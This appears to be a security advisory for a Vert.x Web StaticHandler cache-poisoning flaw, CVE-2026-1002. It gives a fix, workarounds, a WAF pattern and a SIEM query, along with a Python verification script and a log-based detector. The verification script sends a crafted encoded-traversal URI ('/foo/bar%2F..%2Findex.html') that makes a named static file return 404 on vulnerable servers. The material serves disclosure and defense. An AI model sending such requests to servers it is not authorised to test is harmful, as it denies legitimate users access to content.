CVE-2026-1002

5.3 MEDIUM

📋 TL;DR

This vulnerability in Vert.x Web's StaticHandler lets an unauthenticated attacker poison the handler's cache with specially crafted URIs so that subsequent legitimate requests for static files are refused. It affects applications that use StaticHandler with caching enabled. The root cause is improper URI normalization when the handler resolves the request path, so a crafted URI and the legitimate path are not handled consistently.

💻 Affected Systems

Products:
  • Vert.x Web
  • Vert.x Core
Versions: All versions before the fix in PR #5895
Operating Systems: All platforms running Vert.x
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects applications using StaticHandler with caching enabled (default is enabled).

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete denial of service for all static content served by the application, breaking any functionality that depends on those assets.

🟠 Likely Case: Selective denial of access to specific static files, causing partial service disruption for users.

🟢 If Mitigated: No impact if caching is disabled or the patch is applied.

🌐 Internet-Facing: HIGH - Publicly accessible static handlers can be easily targeted with simple HTTP requests.
🏢 Internal Only: MEDIUM - Internal applications are still vulnerable but have reduced attack surface.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only HTTP requests with crafted URIs, no authentication needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: the release containing the fix from PR #5895 (see the vendor advisory below)

Vendor Advisory: https://github.com/eclipse-vertx/vert.x/pull/5895

Restart Required: Yes

Instructions:

1. Update Vert.x to a release containing the fix from PR #5895.
2. Restart the application.
3. Confirm the fix using the steps under "How to Verify": a crafted request must no longer cause the legitimate static path to return 404.

🔧 Temporary Workarounds

Disable Static Handler Cache (applies to all platforms)

Disables the StaticHandler cache, which removes the state an attacker can poison. Every static request then goes to the filesystem, so expect higher latency and I/O on asset-heavy sites until you can patch.

import io.vertx.ext.web.handler.StaticHandler;

StaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);

🧯 If You Can't Patch

  • Implement WAF rules to block URIs containing patterns like '%2F..%2F'. Match case-insensitively ('%2f' is equivalent) and consider other encodings of the same dot segment (for example '%2e%2e'), since the advisory's pattern is one instance of encoded traversal.
  • Use a reverse proxy to normalize URIs before they reach Vert.x. Confirm that the proxy actually rewrites the request-target it forwards, rather than only normalizing for its own routing, or the crafted URI will still arrive at StaticHandler unchanged.

🔍 How to Verify

Check if Vulnerable:

Test with a crafted URI: request a known static file (for example '/foo/index.html') and confirm it returns 200. Then request the same file through a crafted URI that normalizes to the same path, such as '/foo/bar%2F..%2Findex.html'. Finally request the original path again. If the original path now returns 404, the crafted request poisoned the cache entry and the system is vulnerable. A single 404 for the crafted URI on its own is not conclusive; the poisoned legitimate path is what confirms the bug.

Check Version:

Check Vert.x version in application dependencies or runtime

Verify Fix Applied:

Repeat the test above: after the crafted request, the legitimate path must keep returning 200. The crafted URI itself should be served or rejected consistently rather than leaving a 404 behind for the real file.
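The three requests above as a script. This is an added example, not code from the advisory or from the Vert.x project. It assumes the advisory's crafted pattern with an arbitrary bogus segment named 'bar', and the two simulated servers are stand-ins that reproduce only the observable behaviour described on this page (not Vert.x's cache internals) so the check can be exercised offline; against a live target pass the base URL and the known static path on the command line.

```python
"""Active check for the StaticHandler cache-poisoning behaviour described above.

Added example, not code from the advisory or the Vert.x project. Assumes the
advisory's crafted pattern '<dir>/bar%2F..%2F<file>' ('bar' is an arbitrary
bogus segment) and a target that serves a known static file.
"""
import posixpath
import sys
from typing import Callable, Dict
from urllib.error import HTTPError
from urllib.parse import unquote
from urllib.request import urlopen

Fetch = Callable[[str], int]  # request path -> HTTP status code


def http_status(base_url: str) -> Fetch:
    """Fetcher that issues real GETs against base_url (e.g. http://127.0.0.1:8080)."""
    def fetch(path: str) -> int:
        try:
            with urlopen(base_url + path) as resp:
                return resp.status
        except HTTPError as err:
            return err.code
    return fetch


def crafted_variant(path: str) -> str:
    """Insert a bogus segment plus an encoded '/../' so the URI still normalises to path."""
    directory, _, filename = path.rpartition("/")
    return f"{directory}/bar%2F..%2F{filename}"


def check_cache_poisoning(fetch: Fetch, known_path: str) -> Dict[str, object]:
    """Baseline, crafted request, baseline again. The order matters: the crafted
    request must sit between the two legitimate ones, and a baseline that is not
    200 to begin with makes the result inconclusive rather than 'not vulnerable'."""
    before = fetch(known_path)
    crafted = fetch(crafted_variant(known_path))
    after = fetch(known_path)
    return {
        "before": before,
        "crafted": crafted,
        "after": after,
        "inconclusive": before != 200,
        "vulnerable": before == 200 and after == 404,
    }


def simulated_vulnerable_server(files=("/foo/index.html",)) -> Fetch:
    """Offline stand-in (an assumption for demonstration) reproducing only the
    observable behaviour the advisory describes: a crafted request makes the
    legitimate path 404 afterwards. It is not a model of Vert.x's cache logic."""
    poisoned = set()

    def fetch(path: str) -> int:
        if "%2F..%2F" in path.upper():
            poisoned.add(posixpath.normpath(unquote(path)))
            return 404
        return 200 if path in files and path not in poisoned else 404
    return fetch


def simulated_patched_server(files=("/foo/index.html",)) -> Fetch:
    """Stand-in for a fixed deployment: paths are normalised consistently and
    nothing is remembered across requests."""
    def fetch(path: str) -> int:
        return 200 if posixpath.normpath(unquote(path)) in files else 404
    return fetch


if __name__ == "__main__":
    # Usage: python check.py http://host:port /static/index.html
    if len(sys.argv) == 3:
        fetch, path = http_status(sys.argv[1]), sys.argv[2]
    else:
        fetch, path = simulated_vulnerable_server(), "/foo/index.html"
    print(check_cache_poisoning(fetch, path))
```

Run it against a staging instance or a throwaway asset, not a production path: on a vulnerable deployment the check deliberately poisons the cache entry for the file you name, and that file stays unavailable until the entry expires or the process restarts.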

📡 Detection & Monitoring

Log Indicators:

  • Multiple 404 responses for known static files
  • URIs containing '%2F..%2F' patterns in access logs

Network Indicators:

  • HTTP requests with encoded slash patterns in URIs
  • Unusual 404 response patterns for static content

SIEM Query:

http.uri contains "%2F..%2F" AND http.status_code = 404

Match case-insensitively ('%2f' is equivalent) and adapt the field names to your platform. The higher-confidence signal is a static path that served 200 and then returns 404 after such a request normalized onto it.
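The log indicators and the SIEM query above, turned into detection logic over access-log lines. This is an added example, not from the advisory or the Vert.x project. It generalises the literal '%2F..%2F' pattern to any percent-encoding that hides a '..' segment (case-insensitive, including '%2e%2e'), and correlates such a request with a later 404 on the path it collapses onto. The log lines are constructed for illustration; the IP addresses and paths are made up.

```python
"""Detect the cache-poisoning pattern in Common Log Format access logs.

Added example, not code from the advisory or the Vert.x project. The sample
log lines below are constructed; the attacker address 203.0.113.9 is made up.
"""
import posixpath
import re
from urllib.parse import unquote

# Common Log Format: client, ident, user, [timestamp], "METHOD URI PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# A '..' path segment, anchored on segment boundaries.
DOT_SEG = re.compile(r"(^|/)\.\.(/|$)")

SAMPLE_LOG = [  # constructed for this example
    '198.51.100.7 - - [12/Mar/2026:10:00:01 +0000] "GET /static/app.js HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Mar/2026:10:00:05 +0000] "GET /static/x%2F..%2Fapp.js HTTP/1.1" 404 0',
    '198.51.100.7 - - [12/Mar/2026:10:00:09 +0000] "GET /static/app.js HTTP/1.1" 404 0',
    '198.51.100.7 - - [12/Mar/2026:10:00:11 +0000] "GET /static/site.css HTTP/1.1" 200 800',
    '203.0.113.9 - - [12/Mar/2026:10:00:12 +0000] "GET /static/%2e%2e/site.css HTTP/1.1" 404 0',
]


def parse_line(line):
    """Return the fields as a dict, or None for lines that are not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def hides_dot_segment(uri):
    """True when percent-decoding the path reveals a '..' segment that the raw URI
    did not show. Covers %2F..%2F, %2f..%2f and %2e%2e alike; a literal '/../'
    with no encoding is ordinary traversal and is not what this advisory is about."""
    path = uri.split("?", 1)[0]
    if "%" not in path:
        return False
    decoded = unquote(path)
    return bool(DOT_SEG.search(decoded)) and not DOT_SEG.search(path)


def target_path(uri):
    """Path a crafted URI collapses to once decoded and dot-segments are removed,
    i.e. the legitimate file whose cache entry it can affect."""
    return posixpath.normpath(unquote(uri.split("?", 1)[0]))


def analyze(lines):
    """Walk the log in order. Collect every request that hides a dot segment, and
    alert when a path that previously served 200 starts returning 404 after such a
    request collapsed onto it: the denial-of-access pattern the advisory describes."""
    served_ok = set()
    crafted_by_target = {}
    suspicious, alerts = [], []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        uri, status = rec["uri"], rec["status"]
        if hides_dot_segment(uri):
            suspicious.append(rec)
            crafted_by_target[target_path(uri)] = rec
            continue
        path = uri.split("?", 1)[0]
        if status == 200:
            served_ok.add(path)
        elif status == 404 and path in served_ok and path in crafted_by_target:
            crafted = crafted_by_target.pop(path)  # alert once per poisoning event
            alerts.append({
                "path": path,
                "ts": rec["ts"],
                "attacker": crafted["ip"],
                "crafted_uri": crafted["uri"],
            })
    return suspicious, alerts


if __name__ == "__main__":
    found, hits = analyze(SAMPLE_LOG)
    for rec in found:
        print("suspicious:", rec["ip"], rec["uri"], rec["status"])
    for hit in hits:
        print("ALERT poisoned:", hit)
```

The two lists are kept separate on purpose: the suspicious requests are the low-cost indicator the SIEM query already gives you, while an alert requires the 200-then-404 flip on the collapsed path, which is much harder to trigger by accident and is worth paging on.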
